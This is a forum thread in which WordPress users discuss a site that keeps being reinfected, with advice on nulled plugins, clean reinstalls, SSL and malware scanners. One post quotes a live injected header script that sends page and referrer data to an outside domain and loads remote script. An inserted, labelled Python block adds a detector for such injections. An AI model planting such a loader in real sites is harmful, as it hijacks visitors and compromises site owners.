Someone Messing With My Wordpress Site

Discussion in 'Blogging' started by Donbuffy, Nov 12, 2016.

  1. Donbuffy

    I've been having a series of attacks on my website, which is designed using WordPress. First I got malware injections in my DB and I almost lost everything on the site, then now I get brute-forcing attempts on my admin login page (saw the notifications from my Wordfence plugin). Now someone has claimed ownership of the domain through Google Webmaster using the HTML file verification, and a couple of minutes ago I got a message from Google that my website has been blacklisted due to hacked content detected. I used the "site:yourdomain.com" method of tracing the pages and I get many spam pages in the search results, but I can't find them in my file manager or the WordPress pages column. I contacted my host a couple of times to scan and quarantine malware on the domain, and this is the third time in a week it was scanned; the malware found was quarantined and replaced with the default WordPress core files... Does anyone have ideas to make this stop totally?
     
  2. CyberHour

    Hello Donbuffy,
    Most likely someone from your competitors loves you, or you are using nulled themes/plugins (this regarding the infection).

    A fresh WP installation, installing a premium (not nulled) theme, and adding a brute-force blocker and SSL are your first steps.

    Scan your files, and especially /wp-content/upload, which should have only images.

    Best Regards,
    Alex-CyberHour
     
  3. JJJackson

    Sanitize your SQL queries (prepare, execute); you can also whitelist IPs to prevent brute-force attacks. You could also use private/public keys or implement a system like fail2ban to ban IPs on failed login attempts.
     
  4. Juneja

    Are you using a nulled theme or plugin?
     
  5. Donbuffy

    Some time ago I used a few nulled plugins; deactivated them already.
     
  6. gabryel1990

    I recently deleted 2 big websites due to malware. Here are my conclusions:

    - once it gets infected, start from scratch, delete everything you had before
    - all the websites (WP) in the same public_html folder will be infected, delete them all
    - never accept themes or plugins from someone else - they can be nulled - infected
    - keep all your websites up to date - WP version, themes and plugins - I guess this was my vulnerability, one old website with a few articles was getting visits daily, I don't know from where but someone prepared this for a long time.
    - on all the infested websites I found the same .zip file. This archive should not be there, so that's how the virus was uploaded.
    - finally, I lost a lot of money. The virus was redirecting all my mobile users to their ads :)

    Good luck!
     
  7. Donbuffy

    Thanks for this, CyberHour. Can you recommend a plugin I can use to scan my /wp-content/upload, or should I talk to my host about it?
    Currently using Wordfence and its scan takes days to work well....

    Well, I already deactivated and deleted the nulled plugin on the site, yet I still get attacks... how do I clean up the site?

    Been recommended Sucuri site scan for malware removal for $16 a month.

    Do you think getting an SSL certificate would stop/minimize the attacks? Hardly see blogs with https://?
     
  8. CyberHour

    Donbuffy, your host should be able to remove any non-jpeg/jpg/png/gif format file in there. Also, with .htaccess in /upload you can disable any other formats.

    We suggest using Anti-Malware Security and Brute-Force Firewall; it's free and works perfectly.

    Removing/deactivating does not change anything on an already infected website. You will have to make a fresh installation and then replace the wp_posts SQL with your old one, so you transfer your posts and only those.

    You will hardly see blogs WITHOUT SSL pretty soon :) If you are on shared hosting, ask your host to activate Let's Encrypt, which is free, or if you are on a VPS, install Let's Encrypt yourself.

    Best Regards,
    Alex-CyberHour
     
  9. BulletServers

    Do not waste your time on fixing it.

    Remove everything and start from scratch. Change email, hosting providers and start.

    It will be up and working in a few days, and never use nulled plugins and stuff again.
     
  10. fadale07

    Let's say we start the website again from scratch, using the same domain and content; will it affect our ranking in Google?

    I'm facing the same issue, malware keeps coming into my website. After I deleted the malware in the header section, a few hours later the malware came back.

    Is anyone else facing this kind of script that keeps getting injected in the header?

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://goroomie.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
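
Added example, not part of fadale07's post: a heuristic that finds inline scripts shaped like the one quoted above (a `document.write` of a script tag, a closing tag split into pieces, an off-site URL) so a re-injected header can be spotted after each cleanup. The sample template is constructed, with the URL replaced by a reserved example domain; `suspicious_inline_scripts` and `own_hosts` are hypothetical names, and `own_hosts` is assumed to be lowercase.

```python
import re

# Constructed header template: one ordinary inline script and one that follows
# the pattern posted above (reserved example domain instead of the real URL).
SAMPLE_HEADER = """<head>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>var r = encodeURIComponent(document.referrer);
var base = "http://injected.example/js/jquery.min.php";
document.write('<script src="' + base + '?se_referrer=' + r + '">' + '<' + '/script>');</script>
</head>"""

# Straight and typographic quotes: copies pasted through an editor get curly quotes.
QUOTES = "\"'\u201c\u201d\u2018\u2019"
URL = re.compile(r"[%s]https?://([^/%s\s]+)" % (QUOTES, QUOTES))
SPLIT_CLOSE = re.compile(r"<[%s\s+]+/script" % QUOTES)   # matches '<' + '/script>'
INLINE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

def suspicious_inline_scripts(html, own_hosts=()):
    """Return (line, external_hosts, indicators) for inline scripts that look injected."""
    findings = []
    for m in INLINE.finditer(html):
        body = m.group(1)
        hosts = sorted({h.lower() for h in URL.findall(body)} - set(own_hosts))
        indicators = []
        if re.search(r"document\.write\s*\(", body) and re.search(r"<script", body, re.I):
            indicators.append("writes a script tag")
        if SPLIT_CLOSE.search(body):
            indicators.append("split closing tag")
        if "document.referrer" in body:
            indicators.append("reads referrer")
        # Require an off-site URL plus at least two indicators to limit noise.
        if hosts and len(indicators) >= 2:
            line = html.count("\n", 0, m.start()) + 1
            findings.append((line, hosts, indicators))
    return findings

if __name__ == "__main__":
    for finding in suspicious_inline_scripts(SAMPLE_HEADER):
        print(finding)
```
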
     
  11. Donbuffy

    You make it sound so easy, removing everything would cost me all my posts and redesign, changing email, hosting providers won't stop the attack from coming in...

    But you have a point.
     
  12. MikeyMikey13

    Well, take this as a lesson not to use nulled themes. Thought you were saving some $$ but it came back to bite you.
     
  13. We Bring Rank

    Try to avoid free nulled themes and plugins... and add SSL to your site and also anti-malware to your site. For these, you need to spend more.
     
    Last edited: Nov 12, 2016
  14. CyberHour

    And can you explain to others HOW the hosting provider is related to such an issue? :)
     
  15. aa33030

    It's a "bulletservers" promotional post o_O
     
  16. CyberHour

    :)
     
  17. Donbuffy

    Can you recommend any anti-malware plugin? So far Wordfence & WP Security is what I have tried out.
     
  18. Donbuffy

    Trying to export my posts and pages in a .xml file using the WordPress export tool, wipe the whole site out... install a new WordPress and redesign.
    Hope that works out well!

    Still don't know how SSL is going to protect my blog from future attacks (doing some research tho), might just go for it....

    It seems the malware is also affecting a few domains on my shared server, maybe I could just move this one to a new separate server.
     
  19. jamil

    Possible that the server is infected, especially if the host has scanned it and the problem is still there; getting your sites off that server would be a good move.
     
  20. CyberHour

    Short answer: nope
    Long answer: unless you are on hosting provided by amateurs.
     